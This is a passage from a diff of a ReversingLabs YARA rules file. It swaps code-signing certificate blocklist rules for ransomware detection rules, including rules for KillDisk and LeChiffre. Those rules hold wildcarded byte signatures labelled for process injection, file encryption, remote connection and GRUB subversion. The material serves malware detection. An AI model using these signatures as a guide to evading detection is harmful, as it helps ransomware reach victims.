?? FF 15 ?? ?? ?? ?? 8B F8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8B C6 8D 8D + ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 + C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ?? ?? + ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 15 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? + 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? + ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 + ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? + ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 + ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? + ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B + 4D ?? 85 C9 74 ?? 51 8B D0 E8 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? + 2B CE F7 E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 8D 0C 40 8B C6 C1 E1 ?? 81 F9 ?? ?? ?? ?? + 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? + 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 + 5B C3 E8 + } + $remote_connection_p1 = { + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 + ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 28 45 + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 ?? 0F 28 45 + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 + ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 0F 29 45 ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 29 45 + } + $remote_connection_p2 = { + 0F 28 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF 85 ?? ?? ?? ?? 50 0F 29 45 + ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 + ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ?? + ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 + 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 0F 43 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 50 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 + 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 FA ?? 72 ?? 8B + 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? + 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 + } + $encrypt_files = { + 8B FF 55 8B EC 83 EC ?? 8B 4D ?? 89 4D ?? 53 56 8B 75 ?? 57 8B 7D ?? 89 7D ?? 85 C9 + 0F 84 ?? ?? ?? ?? 85 FF 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B C6 8B D6 C1 FA ?? 83 E0 ?? 6B C0 ?? 89 + 55 ?? 8B 14 95 ?? ?? ?? ?? 89 45 ?? 8A 5C 02 ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 + F7 D0 A8 ?? 74 ?? 8B 45 ?? F6 44 02 ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? + 83 C4 ?? 56 E8 ?? ?? ?? ?? 59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 0F 87 ?? ?? ?? + ?? FF 75 ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8D + 45 ?? 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 0C 85 ?? ?? ?? ?? 8B 45 ?? + 80 7C 01 ?? ?? 7D ?? 0F BE C3 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 0F 85 ?? ?? ?? + ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? + ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 57 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 01 ?? 8D 7D ?? + 33 C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? + FF 15 ?? ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 45 ?? 85 C0 75 ?? 8B 45 ?? + 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 + 30 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? 8B 4D ?? 8B + 04 85 ?? ?? ?? ?? F6 44 08 ?? ?? 74 ?? 80 3F ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 20 ?? E9 ?? ?? ?? ?? 2B 45 ?? EB ?? 33 C0 5F 5E 5B C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PORT-SERVIS LTD, TOV" and pe.signatures[i].serial=="06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($inject_code_into_process) and ( all of ($find_files_p*)) and ($encrypt_files) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE +rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects KillDisk ransomware." author = "ReversingLabs" - id = "01eba681-8c98-5553-b369-941b6dba11e2" - date = "2023-11-08" - modified = "2023-11-08" + id = "af6652dd-c668-5ae1-b51b-e272cb440c20" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3544-L3560" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "KillDisk" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_1 = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 + 89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 + ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? + ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B + 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ?? + ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? + 85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0 + 48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ?? + ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? + ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 + 83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1 + } + $encrypt_files_2 = { + EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 + CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? + ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? + ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ?? + ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48 + C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B + 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8 + ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 + ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? + 48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 + C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA + ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? + ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33 + 34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 + } + $search_files = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 + 89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8 + ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? + ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? + 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? + E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 + ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? + ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? + ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 + D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ?? + ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0 + 66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 + C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D + 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ?? + 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? + ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? + 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 + } + $subvert_grub_1 = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8 + ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 + ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? + ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? + ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 + ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 + ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? + ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? + ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? + ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 + } + $subvert_grub_2 = { + 48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? + ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? + 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? + ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? + ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 + 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ?? + ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? + ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 + E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? + ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ?? + ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85 + } + $subvert_grub_3 = { + 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? + ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? + ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? + ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ?? + ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 + 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? + 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? + ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 + ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? + ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D + ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D + B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B + 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Leadership Solutions Limited" and pe.signatures[i].serial=="06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001<=pe.signatures[i].not_after) + uint32(0)==0x464C457F and ($search_files and ( all of ($encrypt_files_*)) and ( all of ($subvert_grub_*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects LeChiffre ransomware." author = "ReversingLabs" - id = "0c475e89-9729-53b9-a301-7a9faa0fef91" - date = "2023-11-08" - modified = "2023-11-08" + id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3562-L3578" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0" + 